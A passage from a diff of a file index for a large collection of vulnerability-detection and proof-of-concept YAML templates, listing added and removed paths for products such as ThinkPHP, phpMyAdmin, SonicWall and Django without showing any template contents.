+./poc/other/provider-path-9702.yaml ./poc/other/provider-path.yaml ./poc/other/proxmox-panel.yaml ./poc/other/proxmox-ve.yaml @@ -71156,6 +71144,7 @@ ./poc/other/pt-elementor-addons-lite-plugin.yaml ./poc/other/pt-elementor-addons-lite.yaml ./poc/other/ptr-fingerprint-9707.yaml +./poc/other/ptr-fingerprint.yaml ./poc/other/ptypeconverter-de0336e587f9f6b9a860440eebc3c601.yaml ./poc/other/ptypeconverter.yaml ./poc/other/public-documents.yaml @@ -71184,6 +71173,7 @@ ./poc/other/pulsar360-admin-panel.yaml ./poc/other/pulse-secure-panel-9712.yaml ./poc/other/pulse-secure-panel-9713.yaml +./poc/other/pulse-secure-panel-9714.yaml ./poc/other/pulse-secure-panel-9715.yaml ./poc/other/pulse-secure-panel.yaml ./poc/other/pulse-secure-version.yaml @@ -71214,9 +71204,9 @@ ./poc/other/push-notification-for-post-and-buddypress-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/push-notification-for-post-and-buddypress-plugin.yaml ./poc/other/push-notification-for-post-and-buddypress.yaml -./poc/other/put-m-enb.yaml ./poc/other/put-method-enabled-9726.yaml ./poc/other/put-method-enabled-9727.yaml +./poc/other/put-method-enabled-9728.yaml ./poc/other/putMethod-1.yaml ./poc/other/putMethod-2.yaml ./poc/other/putmethod-1.yaml @@ -71265,11 +71255,10 @@ ./poc/other/qcodo-development-framework.yaml ./poc/other/qcubed-development-framework.yaml ./poc/other/qcubed-workflow.yaml +./poc/other/qdpm-info-leak-9750.yaml ./poc/other/qdpm-info-leak-9751.yaml ./poc/other/qdpm-info-leak-9752.yaml -./poc/other/qdpm-info-leak-9753.yaml ./poc/other/qdpm-info-leak-9754.yaml -./poc/other/qdpm-info-leak.yaml ./poc/other/qe-seo-handyman-41cf2b5091a855715a41f6fd63cde04c.yaml ./poc/other/qe-seo-handyman-478c02c6c55f7c262f68d1ab8607d6af.yaml ./poc/other/qe-seo-handyman.yaml @@ -71536,7 +71525,8 @@ ./poc/other/r-seenet-workflow.yaml ./poc/other/rabbit-loader-c82cb72a96a7e8a44e3fa4554cd33e13.yaml ./poc/other/rabbit-loader.yaml -./poc/other/race-simple.yaml +./poc/other/race-multiple.yaml +./poc/other/rack-mini-profiler-9788.yaml ./poc/other/rack-mini-profiler-9789.yaml ./poc/other/rack-mini-profiler-9790.yaml ./poc/other/rack-mini-profiler-9791.yaml @@ -72101,6 +72091,7 @@ ./poc/other/resim-ara-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/resim-ara-plugin.yaml ./poc/other/resim-ara.yaml +./poc/other/resin-inputfile-fileread-9868.yaml ./poc/other/resin-inputfile-fileread-9869.yaml ./poc/other/resin-inputfile-fileread-9870.yaml ./poc/other/resin-inputfile-fileread-9871.yaml @@ -72451,7 +72442,6 @@ ./poc/other/robolist-lite-theme.yaml ./poc/other/robolist-lite.yaml ./poc/other/robots-9887.yaml -./poc/other/robots-9889.yaml ./poc/other/robots-txt-9886.yaml ./poc/other/robots-txt-9888.yaml ./poc/other/robots-txt-9890.yaml @@ -72568,8 +72558,8 @@ ./poc/other/royal-slider.yaml ./poc/other/royalevent-management-panel.yaml ./poc/other/rpcbind-portmapper.yaml -./poc/other/rsa-self-service-9910.yaml ./poc/other/rsa-self-service-9911.yaml +./poc/other/rsa-self-service-9912.yaml ./poc/other/rsa-self-service.yaml ./poc/other/rsfirewall-265dc4143d82225bb1efb384ee2f7c52.yaml ./poc/other/rsfirewall.yaml @@ -72645,6 +72635,7 @@ ./poc/other/ruijie-cloud.yaml ./poc/other/ruijie-eg-file-read.yaml ./poc/other/ruijie-eg-file-read.yml +./poc/other/ruijie-eg-filedown.yaml ./poc/other/ruijie-eg-info-leak.yml ./poc/other/ruijie-eg易网关.yaml ./poc/other/ruijie-it.yaml @@ -72935,7 +72926,7 @@ ./poc/other/scrollsequence.yaml ./poc/other/scs-landfill-control-10095.yaml ./poc/other/scs-landfill-control-10096.yaml -./poc/other/scs-landfill-control-10097.yaml +./poc/other/scs-landfill-control-10098.yaml ./poc/other/scs-landfill-control.yaml ./poc/other/scv1-119cdc16fe916df3add67c8763d4fc01.yaml ./poc/other/scv1-31fa1f0e3c61b1f050d66cb517e56e41.yaml @@ -73042,7 +73033,6 @@ ./poc/other/seeyon_log4j.yaml ./poc/other/selea-ip-camera-10132.yaml ./poc/other/selea-ip-camera-10133.yaml -./poc/other/selea-ip-camera-10134.yaml ./poc/other/selea-ip-camera-10135.yaml ./poc/other/selea-ip-camera-10136.yaml ./poc/other/selea-ip-camera.yaml @@ -73273,11 +73263,11 @@ ./poc/other/server-status-by-hostnameip.yaml ./poc/other/server-status-localhost-10163.yaml ./poc/other/server-status-localhost-10164.yaml -./poc/other/server-status-localhost-10165.yaml +./poc/other/server-status-localhost-10166.yaml ./poc/other/server-status-localhost.yaml ./poc/other/servfail-refused-hosts-10167.yaml ./poc/other/servfail-refused-hosts-10168.yaml -./poc/other/servfail-refused-hosts-10169.yaml +./poc/other/servfail-refused-hosts-10170.yaml ./poc/other/servfail-refused-hosts.yaml ./poc/other/service-area-postcode-checker-57707f3012d1f1c79fc5af2afbec3d55.yaml ./poc/other/service-area-postcode-checker.yaml @@ -73393,7 +73383,6 @@ ./poc/other/sheetpress.yaml ./poc/other/shell-box.yaml ./poc/other/shell-history-1.yaml -./poc/other/shell-history-10191.yaml ./poc/other/shell-history-10192.yaml ./poc/other/shell-history-10193.yaml ./poc/other/shell-history-2.yaml @@ -73402,7 +73391,6 @@ ./poc/other/shells.yaml ./poc/other/shellscripts-1.yaml ./poc/other/shellscripts-10.yaml -./poc/other/shellscripts-10194.yaml ./poc/other/shellscripts-11.yaml ./poc/other/shellscripts-12.yaml ./poc/other/shellscripts-13.yaml @@ -73619,10 +73607,10 @@ ./poc/other/sidebar-manager.yaml ./poc/other/sideblog-de06c6cd776a8d198247303108ff7a16.yaml ./poc/other/sideblog.yaml -./poc/other/sidekiq-dashboard-10235.yaml ./poc/other/sidekiq-dashboard-10236.yaml ./poc/other/sidekiq-dashboard-10237.yaml ./poc/other/sidekiq-dashboard-10238.yaml +./poc/other/sidekiq-dashboard-10239.yaml ./poc/other/sidekiq-dashboard.yaml ./poc/other/sidekiq-workflow.yaml ./poc/other/signal-phish.yaml @@ -73655,7 +73643,6 @@ ./poc/other/signatures-10265.yaml ./poc/other/signatures-10266.yaml ./poc/other/signatures-10267.yaml -./poc/other/signatures-10268.yaml ./poc/other/signatures-10269.yaml ./poc/other/signatures-10270.yaml ./poc/other/signatures.yaml @@ -74176,9 +74163,8 @@ ./poc/other/sitebuilder-dynamic-components.yaml ./poc/other/sitecore-version-10290.yaml ./poc/other/sitecore-version-10291.yaml -./poc/other/sitecore-version-10292.yaml -./poc/other/sitecore-workflow-10293.yaml ./poc/other/sitecore-workflow-10294.yaml +./poc/other/sitecore-workflow.yaml ./poc/other/sitecore.yaml ./poc/other/siteengine.yaml ./poc/other/sitegenius.yaml @@ -74191,7 +74177,6 @@ ./poc/other/sitemap-by-click5-bb55523a8065ab01450d6332a0f9b83d.yaml ./poc/other/sitemap-by-click5.yaml ./poc/other/sitemap-index.yaml -./poc/other/sitemap.yaml ./poc/other/siteminderagent.yaml ./poc/other/siteorigin-panels-0c18557898a1d94d25aeb04bcb7e7891.yaml ./poc/other/siteorigin-panels-20b6552057669c22e92f742a513eab73.yaml @@ -74229,7 +74214,6 @@ ./poc/other/skycaiji-admin-panel-10304.yaml ./poc/other/skycaiji-admin-panel-10305.yaml ./poc/other/skycaiji-admin-panel.yaml -./poc/other/skycaiji-install-10307.yaml ./poc/other/skycaiji-install-10308.yaml ./poc/other/skycaiji-install-10309.yaml ./poc/other/skype-online-status-9f15557ccabde64a973fe40ac2ed6cd0.yaml @@ -74608,7 +74592,6 @@ ./poc/other/solr-query-dashboard-10367.yaml ./poc/other/solr-query-dashboard-10368.yaml ./poc/other/solr-query-dashboard-10369.yaml -./poc/other/solr-query-dashboard-10370.yaml ./poc/other/solr-query-dashboard-2.yaml ./poc/other/solr-workflow.yaml ./poc/other/some-PIIs.yaml @@ -74624,14 +74607,13 @@ ./poc/other/sonicwall-management-panel.yaml ./poc/other/sonicwall-shellshock-vulnerability.yaml ./poc/other/sonicwall-ssl-vpn.yaml -./poc/other/sonicwall-sslvpn-panel-10388.yaml ./poc/other/sonicwall-sslvpn-panel-10389.yaml +./poc/other/sonicwall-sslvpn-panel-10390.yaml ./poc/other/sonicwall-sslvpn-panel.yaml ./poc/other/sonicwall-sslvpn-shellshock-10391.yaml ./poc/other/sonicwall-sslvpn-shellshock-10392.yaml +./poc/other/sonicwall-sslvpn-shellshock-10393.yaml ./poc/other/sonicwall-sslvpn-shellshock-10394.yaml -./poc/other/sonicwall-sslvpn-shellshock-10395.yaml -./poc/other/sonicwall-sslvpn-shellshock.yaml ./poc/other/sony-camera-backdoor.yaml ./poc/other/sony-liv.yaml ./poc/other/sophi-4afed2941162d2b455634089bfa7fe66.yaml @@ -74868,7 +74850,7 @@ ./poc/other/splashscreen.yaml ./poc/other/split-test-for-elementor-bde4325200fb2f444fb8a10edf1336f9.yaml ./poc/other/split-test-for-elementor.yaml -./poc/other/splunk-enterprise-panel-10414.yaml +./poc/other/splunk-enterprise-panel-10415.yaml ./poc/other/splunk-enterprise-panel.yaml ./poc/other/splunk-workflow.yaml ./poc/other/splunk.yaml @@ -74882,7 +74864,6 @@ ./poc/other/spoofable-spf-records-ptr-10424.yaml ./poc/other/spoofable-spf-records-ptr-10425.yaml ./poc/other/spoofable-spf-records-ptr-10426.yaml -./poc/other/spoofable-spf-records-ptr-10427.yaml ./poc/other/sportspress-ae19df4693862355cf869714c073d0eb.yaml ./poc/other/sportspress-d5cbdf2071f42342c858ea33caee55c5.yaml ./poc/other/sportspress-f9477666e5763fb31e0cfe61475d74a6.yaml @@ -74925,6 +74906,7 @@ ./poc/other/squid-analysis-report-generator-10511.yaml ./poc/other/squid-analysis-report-generator-10512.yaml ./poc/other/squid-analysis-report-generator-10513.yaml +./poc/other/squid-analysis-report-generator-10514.yaml ./poc/other/squid-analysis-report-generator.yaml ./poc/other/squirrelmail-workflow.yaml ./poc/other/squirrelmail.yaml @@ -75355,6 +75337,7 @@ ./poc/other/sucuri.yaml ./poc/other/sugarcrm-install.yaml ./poc/other/sugarcrm-panel-1.yaml +./poc/other/sugarcrm-panel-10569.yaml ./poc/other/sugarcrm-panel-10570.yaml ./poc/other/sugarcrm-panel-10571.yaml ./poc/other/sugarcrm-panel-2.yaml @@ -75423,6 +75406,7 @@ ./poc/other/supervisord.yaml ./poc/other/supervpn-panel-10575.yaml ./poc/other/supervpn-panel-10576.yaml +./poc/other/supervpn-panel-10577.yaml ./poc/other/supervpn-panel.yaml ./poc/other/support-genix-lite-64c576dc3e88ee994a3bf9f765a979d3.yaml ./poc/other/support-genix-lite.yaml @@ -75586,8 +75570,9 @@ ./poc/other/symantec-messaging-gateway-10608.yaml ./poc/other/symantec-messaging-gateway-10609.yaml ./poc/other/symantec-messaging-gateway-10610.yaml +./poc/other/symantec-messaging-gateway.yaml +./poc/other/symantec-pgp-global-directory-10611.yaml ./poc/other/symantec-pgp-global-directory-10612.yaml -./poc/other/symantec-pgp-global-directory-10613.yaml ./poc/other/symantec-pgp-global-directory.yaml ./poc/other/symantec-phishing-panel.yaml ./poc/other/symantec-phishing-readiness-platform.yaml @@ -75598,7 +75583,7 @@ ./poc/other/symfony-fuck.yaml ./poc/other/symfony-profiler-10624.yaml ./poc/other/symfony-profiler-10625.yaml -./poc/other/symfony-profiler-10626.yaml +./poc/other/symfony-profiler-10627.yaml ./poc/other/symfony-profiler-10628.yaml ./poc/other/symfony-profiler.yaml ./poc/other/symfony-workflow.yaml @@ -75672,7 +75657,7 @@ ./poc/other/table-of-contents-plus-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/table-of-contents-plus-plugin.yaml ./poc/other/table-of-contents-plus.yaml -./poc/other/tableau-panel-10642.yaml +./poc/other/tableau-panel-10641.yaml ./poc/other/tableau-panel.yaml ./poc/other/tableau-service-manager.yaml ./poc/other/tableau.yaml @@ -75827,6 +75812,7 @@ ./poc/other/tectuus-scada-monitor.yaml ./poc/other/tekon-info-leak-10684.yaml ./poc/other/tekon-info-leak-10685.yaml +./poc/other/tekon-info-leak.yaml ./poc/other/tekton-dashboard.yaml ./poc/other/telefication-1c7925e1a8107c9a8d402138b26021c6.yaml ./poc/other/telefication.yaml @@ -75897,6 +75883,7 @@ ./poc/other/teradata-parallel.yaml ./poc/other/teradek-panel.yaml ./poc/other/teradici-pcoip-10701.yaml +./poc/other/teradici-pcoip-10702.yaml ./poc/other/teradici-pcoip-10703.yaml ./poc/other/teradici-pcoip-10704.yaml ./poc/other/teradici-pcoip-panel.yaml @@ -75908,6 +75895,7 @@ ./poc/other/terraclassifieds.yaml ./poc/other/terraform-enterprise-panel-10710.yaml ./poc/other/terraform-enterprise-panel-10711.yaml +./poc/other/terraform-enterprise-panel-10712.yaml ./poc/other/terraform-enterprise-panel.yaml ./poc/other/terramaster-workflow.yaml ./poc/other/teslamate.yaml @@ -76226,7 +76214,6 @@ ./poc/other/thinkcmf-arbitrary-code-execution-10716.yaml ./poc/other/thinkcmf-file-include.yaml ./poc/other/thinkcmf-workflow-10731.yaml -./poc/other/thinkcmf-workflow.yaml ./poc/other/thinkcmf-write-shell.yaml ./poc/other/thinkcmf-write-shell.yml ./poc/other/thinkcmf.yaml @@ -76353,6 +76340,7 @@ ./poc/other/tilda-publishing-2e54e8ceac13a46ad30a989ad6459e25.yaml ./poc/other/tilda-publishing.yaml ./poc/other/tileserver-gl-10785.yaml +./poc/other/tileserver-gl-10786.yaml ./poc/other/tileserver-gl-10787.yaml ./poc/other/tileserver-gl.yaml ./poc/other/timber-library-63f508e564b8a4abe97afab9c4153993.yaml @@ -76536,7 +76524,6 @@ ./poc/other/topsec-vpn.yaml ./poc/other/topwalk-mtp.yaml ./poc/other/tor-socks-proxy-10810.yaml -./poc/other/tor-socks-proxy-10811.yaml ./poc/other/tor-socks-proxy-10812.yaml ./poc/other/tor-socks-proxy-10813.yaml ./poc/other/tor-socks-proxy.yaml @@ -76582,7 +76569,6 @@ ./poc/other/trac.yaml ./poc/other/trace-method-10827.yaml ./poc/other/trace-method-10828.yaml -./poc/other/trace-method-10829.yaml ./poc/other/trace-method.yaml ./poc/other/track-geolocation-of-users-using-contact-form-7-7061ffba1feb247e003454bfbe8fc13b.yaml ./poc/other/track-geolocation-of-users-using-contact-form-7.yaml @@ -76627,8 +76613,8 @@ ./poc/other/tradetracker-store.yaml ./poc/other/trading212-phish.yaml ./poc/other/tradingeye.yaml -./poc/other/traefik-dashboard-10832.yaml ./poc/other/traefik-dashboard-10833.yaml +./poc/other/traefik-dashboard-10834.yaml ./poc/other/traefik-dashboard.yaml ./poc/other/traefik-workflow.yaml ./poc/other/traefik.yaml @@ -76799,9 +76785,9 @@ ./poc/other/tutor-pro.yaml ./poc/other/tutor.yaml ./poc/other/tutortrac.yaml -./poc/other/tuxedo-connected-controller-10852.yaml ./poc/other/tuxedo-connected-controller-10853.yaml ./poc/other/tuxedo-connected-controller-10854.yaml +./poc/other/tuxedo-connected-controller-10855.yaml ./poc/other/tuxedo-connected-controller.yaml ./poc/other/twchat-1e11041979895de79516b21f580cfdc5.yaml ./poc/other/twchat-66860598cfdc267acba6e015a017bc01.yaml @@ -77467,9 +77453,10 @@ ./poc/other/upnp-device.yaml ./poc/other/uportal.yaml ./poc/other/ups-status-1.yaml -./poc/other/ups-status-10983.yaml ./poc/other/ups-status-10984.yaml +./poc/other/ups-status-10985.yaml ./poc/other/ups-status-2.yaml +./poc/other/ups-status.yaml ./poc/other/upscale-179320c05c6c92e9b26b9cab26bf1bc3.yaml ./poc/other/upscale-8525917b8f35bb4eaf3e210e14fd7fa5.yaml ./poc/other/upscale-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -78485,7 +78472,7 @@ ./poc/other/wavetop-days.yaml ./poc/other/wayos-panel.yaml ./poc/other/wayos维盟ac集中管理系统.yaml -./poc/other/wazuh-panel-11113.yaml +./poc/other/wazuh-panel-11114.yaml ./poc/other/wazuh-panel.yaml ./poc/other/wbcom-designs-buddypress-ads-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/wbcom-designs-buddypress-ads-edc227605cbf113bcdfd09c53dfc5da4.yaml @@ -78627,8 +78614,8 @@ ./poc/other/weather-effect-5284b6f943106d877b7acf9660a98d2c.yaml ./poc/other/weather-effect-d50716f55355c879f15b8538d76e6a5b.yaml ./poc/other/weather-effect.yaml -./poc/other/weatherlink-11115.yaml ./poc/other/weatherlink-11116.yaml +./poc/other/weatherlink-11117.yaml ./poc/other/weatherlink.yaml ./poc/other/weatimages.yaml ./poc/other/weave-scope-dashboard-11121.yaml @@ -79522,7 +79509,6 @@ ./poc/other/wooyun-2015-097832.yaml ./poc/other/wooyun-2015-148227(1).yaml ./poc/other/wooyun-2015-148227-11224.yaml -./poc/other/wooyun-2015-148227-11225.yaml ./poc/other/wooyun-2015-148227-11226.yaml ./poc/other/wooyun-2015-148227-11227.yaml ./poc/other/wooyun-2015-148227-11228.yaml @@ -79620,9 +79606,9 @@ ./poc/other/workscout-core-4606590a2eb13753a0989142e1712196.yaml ./poc/other/workscout-core.yaml ./poc/other/workscout.yaml +./poc/other/workspace-one-uem-11391.yaml ./poc/other/workspace-one-uem-11392.yaml ./poc/other/workspace-one-uem-11393.yaml -./poc/other/workspace-one-uem-11394.yaml ./poc/other/workspace-one-uem.yaml ./poc/other/workspaceone-uem-dashboard-11390.yaml ./poc/other/workspaceone-uem-dashboard.yaml @@ -79660,6 +79646,7 @@ ./poc/other/wowza-streaming-engine-11395.yaml ./poc/other/wowza-streaming-engine-11396.yaml ./poc/other/wowza-streaming-engine-11397.yaml +./poc/other/wowza-streaming-engine-11398.yaml ./poc/other/wowza-streaming-engine-11399.yaml ./poc/other/wowza-streaming-engine.yaml ./poc/other/wowza-wowzastreamingengine.yaml @@ -79709,13 +79696,12 @@ ./poc/other/wsm-downloader.yaml ./poc/other/wsncm-iot.yaml ./poc/other/wsncm-system.yaml -./poc/other/wso2-2019-0598-11635.yaml +./poc/other/wso2-2019-0598-11636.yaml ./poc/other/wso2-carbon-server.yaml ./poc/other/wso2-management-console-11644.yaml ./poc/other/wso2-management-console-11645.yaml ./poc/other/wso2-management-console-11646.yaml ./poc/other/wso2-management-console.yaml -./poc/other/wso2mgmtconsole.yaml ./poc/other/wstmart.yaml ./poc/other/wti-like-post-801384ebb6b98e29bbc3da65ee0914d2.yaml ./poc/other/wti-like-post-c854ddc867a3e00f9bba9d6f39d622e4.yaml @@ -79848,6 +79834,7 @@ ./poc/other/xpro-elementor-addons.yaml ./poc/other/xprober-service-11693.yaml ./poc/other/xprober-service-11694.yaml +./poc/other/xprober-service.yaml ./poc/other/xqueue-maileon-be234f0448120239ae116f2cb99e0278.yaml ./poc/other/xqueue-maileon.yaml ./poc/other/xserver-migrator.yaml @@ -79904,7 +79891,7 @@ ./poc/other/yandexnews-feed-by-teplitsa-299f13fe73aa8b11cca2e264a3b46f61.yaml ./poc/other/yandexnews-feed-by-teplitsa.yaml ./poc/other/yarn-lock-11727.yaml -./poc/other/yarn-lock-11729.yaml +./poc/other/yarn-lock-11728.yaml ./poc/other/yarn-lock-11730.yaml ./poc/other/yatra-cbaa3d03ba7367a64c11c6690f1f36b8.yaml ./poc/other/yatra.yaml @@ -79987,6 +79974,7 @@ ./poc/other/yml-for-yandex-market.yaml ./poc/other/yongyou-ELTextFile.yaml ./poc/other/yongyou-changjietong-EFI.yaml +./poc/other/yongyou-eltextfile.yaml ./poc/other/yonyou-chanjet-tplus-downloadproxy-filedownload.yaml ./poc/other/yonyou-chanjet-tplus-getdecallusers-infoleak.yaml ./poc/other/yonyou-chanjet-tplus-read-file.yaml @@ -80139,9 +80127,9 @@ ./poc/other/z-downloads-b66f566f59564af0ab02d18ddeb7643f.yaml ./poc/other/z-downloads.yaml ./poc/other/z-url-preview.yaml -./poc/other/zabbix-dashboards-access-11754.yaml ./poc/other/zabbix-dashboards-access-11755.yaml ./poc/other/zabbix-dashboards-access-11756.yaml +./poc/other/zabbix-dashboards-access-11757.yaml ./poc/other/zabbix-dashboards-access.yaml ./poc/other/zabbix-error-11764.yaml ./poc/other/zabbix-error-11765.yaml @@ -80170,6 +80158,7 @@ ./poc/other/zeenshare.yaml ./poc/other/zeever-ee2290bce700f70459aa5a1dc13ef6a4.yaml ./poc/other/zeever.yaml +./poc/other/zeka-1095b08570fd71d7f3c066aaeb5a9c18.yaml ./poc/other/zelist-directory-39c555687baf750f3ce4bbaf99d79c84.yaml ./poc/other/zelist-directory-6e276506d6e62b4906d13703e65e5ee2.yaml ./poc/other/zelist-directory-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -80378,7 +80367,7 @@ ./poc/other/zte-iad语音网关.yaml ./poc/other/zte-panel-11838.yaml ./poc/other/zte-panel-11839.yaml -./poc/other/zte-panel-11841.yaml +./poc/other/zte-panel-11840.yaml ./poc/other/zte-panel.yaml ./poc/other/zte-zxsec统一安全网关.yaml ./poc/other/zuitu.yaml @@ -80578,7 +80567,7 @@ ./poc/perl/g-auto-hyperlink-81316beb083410cec0526b34dd7f787b.yaml ./poc/perl/g-auto-hyperlink.yaml ./poc/perl/libwww-perl-daemon.yaml -./poc/perl/perl-scanner-9484.yaml +./poc/perl/perl-scanner.yaml ./poc/perl/perl-status-9485.yaml ./poc/perl/perl-status-9486.yaml ./poc/perl/perl-status-page.yaml @@ -80648,7 +80637,6 @@ ./poc/php/btoptionscom-hbr_php-sqli.yaml ./poc/php/clockwork-php-page-1017.yaml ./poc/php/clockwork-php-page-1018.yaml -./poc/php/clockwork-php-page-1019.yaml ./poc/php/clockwork-php-page.yaml ./poc/php/cmseasy-crossall-act-php-sql-injection.yaml ./poc/php/config.php.new.yaml @@ -80708,7 +80696,7 @@ ./poc/php/php-backup-files-7.yaml ./poc/php/php-backup-files-8.yaml ./poc/php/php-backup-files-9.yaml -./poc/php/php-backup-files-9497.yaml +./poc/php/php-backup-files-9498.yaml ./poc/php/php-backup-files.yaml ./poc/php/php-cgi-cve-2012-1823.yml ./poc/php/php-cloud.yaml @@ -80722,8 +80710,8 @@ ./poc/php/php-debug-bar.yaml ./poc/php/php-debugbar-exposure.yaml ./poc/php/php-errors-9508.yaml +./poc/php/php-errors-9509.yaml ./poc/php/php-errors-9510.yaml -./poc/php/php-errors-9511.yaml ./poc/php/php-errors-9512.yaml ./poc/php/php-event-calendar-12517f8593a63dbf79626b073a1f1de2.yaml ./poc/php/php-event-calendar-4c41621f6e7b56d3c4fdd926d807fd58.yaml @@ -80752,8 +80740,9 @@ ./poc/php/php-proxy-detect-1.yaml ./poc/php/php-proxy-detect-2.yaml ./poc/php/php-proxy-detect-9544.yaml +./poc/php/php-proxy-detect.yaml ./poc/php/php-scanner-9546.yaml -./poc/php/php-scanner.yaml +./poc/php/php-scanner-9547.yaml ./poc/php/php-server-monitor.yaml ./poc/php/php-shell-0771e0dee276537bea17fe994946d6c2.yaml ./poc/php/php-shell-aa4a6da32c1b252d9d4bc241fb9c858f.yaml @@ -80764,6 +80753,7 @@ ./poc/php/php-shell.yaml ./poc/php/php-support-tickets.yaml ./poc/php/php-symfony-debug.yaml +./poc/php/php-timeclock-xss-9550.yaml ./poc/php/php-timeclock-xss-9551.yaml ./poc/php/php-timeclock-xss-9552.yaml ./poc/php/php-timeclock-xss-9553.yaml @@ -80772,14 +80762,14 @@ ./poc/php/php-to-page.yaml ./poc/php/php-user-ini-disclosure-1.yaml ./poc/php/php-user-ini-disclosure-2.yaml -./poc/php/php-user-ini-disclosure-9559.yaml ./poc/php/php-user-ini-disclosure-9560.yaml +./poc/php/php-user-ini-disclosure-9561.yaml ./poc/php/php-user-ini-disclosure.yaml ./poc/php/php-user-ini.yaml ./poc/php/php-voting-system.yaml -./poc/php/php-warning-9562.yaml ./poc/php/php-warning-9563.yaml ./poc/php/php-warning.yaml +./poc/php/php-zerodium-backdoor-rce-9569.yaml ./poc/php/php-zerodium-backdoor-rce-9570.yaml ./poc/php/php-zerodium-backdoor-rce-9571.yaml ./poc/php/php-zerodium-backdoor-rce-9572.yaml @@ -80797,7 +80787,6 @@ ./poc/php/phpcollab-detect.yaml ./poc/php/phpcollab-panel.yaml ./poc/php/phpcollab-workflow-9502.yaml -./poc/php/phpcollab-workflow.yaml ./poc/php/phpcollab.yaml ./poc/php/phpdealerlocator.yaml ./poc/php/phpdenora.yaml @@ -80825,6 +80814,7 @@ ./poc/php/phpinfo-9.yaml ./poc/php/phpinfo-9517.yaml ./poc/php/phpinfo-9518.yaml +./poc/php/phpinfo-9519.yaml ./poc/php/phpinfo-9520.yaml ./poc/php/phpinfo-9521.yaml ./poc/php/phpinfo-9522.yaml @@ -80848,7 +80838,6 @@ ./poc/php/phpmyadmin-cve-2018-12613-file-inclusion.yml ./poc/php/phpmyadmin-default-login-extended.yaml ./poc/php/phpmyadmin-default-page.yaml -./poc/php/phpmyadmin-misconfiguration.yaml ./poc/php/phpmyadmin-panel-1.yaml ./poc/php/phpmyadmin-panel-10.yaml ./poc/php/phpmyadmin-panel-11.yaml @@ -80872,10 +80861,10 @@ ./poc/php/phpmyadmin-setup-9530.yaml ./poc/php/phpmyadmin-setup-9531.yaml ./poc/php/phpmyadmin-setup-9532.yaml -./poc/php/phpmyadmin-setup-9533.yaml ./poc/php/phpmyadmin-setup-deserialization.yaml ./poc/php/phpmyadmin-setup-deserialization.yml ./poc/php/phpmyadmin-setup.yaml +./poc/php/phpmyadmin-sql-9534.yaml ./poc/php/phpmyadmin-sql-9535.yaml ./poc/php/phpmyadmin-sql-9536.yaml ./poc/php/phpmyadmin-sql.php-server-1.yaml @@ -80902,6 +80891,7 @@ ./poc/php/phppgadmin-panel-9540.yaml ./poc/php/phppgadmin-panel-9541.yaml ./poc/php/phppgadmin-panel-9542.yaml +./poc/php/phppgadmin-panel-9543.yaml ./poc/php/phppgadmin-panel.yaml ./poc/php/phppgadmin-workflow.yaml ./poc/php/phppgadmin.yaml @@ -80929,8 +80919,10 @@ ./poc/php/phpweb.yaml ./poc/php/phpwiki-lfi-9564.yaml ./poc/php/phpwiki-lfi-9565.yaml +./poc/php/phpwiki-lfi-9566.yaml ./poc/php/phpwiki-lfi-9567.yaml ./poc/php/phpwiki-lfi-9568.yaml +./poc/php/phpwiki-lfi.yaml ./poc/php/phpwiki-workflow.yaml ./poc/php/phpwiki.yaml ./poc/php/phpwind-installer.yaml @@ -80946,7 +80938,8 @@ ./poc/php/ruijie-eg-update-php-rce.yaml ./poc/php/ruijie-phpinfo-9950.yaml ./poc/php/ruijie-phpinfo-9951.yaml -./poc/php/ruijie-phpinfo-9953.yaml +./poc/php/ruijie-phpinfo-9952.yaml +./poc/php/ruijie-phpinfo.yaml ./poc/php/samphpweb.yaml ./poc/php/sangfor-cphp-rce.yaml ./poc/php/seagull-php-framework.yaml @@ -80965,22 +80958,23 @@ ./poc/php/simplesamlphp-authentication-f3c175d78e12da649ab69deea15f1f42.yaml ./poc/php/simplesamlphp-authentication.yaml ./poc/php/symfony-phpinfo.yaml +./poc/php/thinkphp-2-rce-10738.yaml ./poc/php/thinkphp-2-rce-10739.yaml ./poc/php/thinkphp-2-rce-10740.yaml ./poc/php/thinkphp-2-rce-10741.yaml ./poc/php/thinkphp-30-rce.yaml ./poc/php/thinkphp-50-rce.yaml ./poc/php/thinkphp-501-rce-10742.yaml -./poc/php/thinkphp-501-rce.yaml +./poc/php/thinkphp-501-rce-10743.yaml ./poc/php/thinkphp-5010-rce.yaml ./poc/php/thinkphp-5022-5129-rce.yaml ./poc/php/thinkphp-5022-rce-10745.yaml ./poc/php/thinkphp-5022-rce-10746.yaml ./poc/php/thinkphp-5022-rce-10747.yaml +./poc/php/thinkphp-5023-rce-10748.yaml ./poc/php/thinkphp-5023-rce-10749.yaml ./poc/php/thinkphp-5023-rce-10750.yaml ./poc/php/thinkphp-5023-rce-10751.yaml -./poc/php/thinkphp-5023-rce.yaml ./poc/php/thinkphp-5024-5130-rce.yaml ./poc/php/thinkphp-509-information-disclosure-10753.yaml ./poc/php/thinkphp-509-information-disclosure-10754.yaml @@ -81068,16 +81062,18 @@ ./poc/python/autobahn-python-detect-592.yaml ./poc/python/autobahn-python-detect-593.yaml ./poc/python/autobahn-python-detect-594.yaml -./poc/python/autobahn-python-detect-595.yaml +./poc/python/autobahn-python-detect.yaml ./poc/python/default-django-page-6840.yaml ./poc/python/default-django-page-6841.yaml ./poc/python/default-django-page-6842.yaml ./poc/python/default-django-page-6843.yaml ./poc/python/django-admin-panel-7021.yaml ./poc/python/django-admin-panel-7022.yaml +./poc/python/django-admin-panel-7023.yaml ./poc/python/django-admin-panel.yaml ./poc/python/django-debug-detect-7024.yaml ./poc/python/django-debug-detect-7025.yaml +./poc/python/django-debug-detect-7026.yaml ./poc/python/django-debug-detect-7027.yaml ./poc/python/django-debug-detect.yaml ./poc/python/django-debug-enable.yaml @@ -81089,18 +81085,18 @@ ./poc/python/django-debug-exposure.yaml ./poc/python/django-debug-toolbar.yaml ./poc/python/django-debug-v2.yaml -./poc/python/django-debug.yaml ./poc/python/django-debugmode-11848.yaml ./poc/python/django-debugmode.yaml ./poc/python/django-directory-traversal.yaml ./poc/python/django-framework-exceptions-7033.yaml ./poc/python/django-framework-exceptions-7034.yaml ./poc/python/django-rest-framework.yaml -./poc/python/django-secret-key.yaml +./poc/python/django-secret.key.yaml ./poc/python/django.yaml ./poc/python/djangodebug.yaml ./poc/python/flask-redis-docker.yaml ./poc/python/flask-werkzeug-debug.yaml 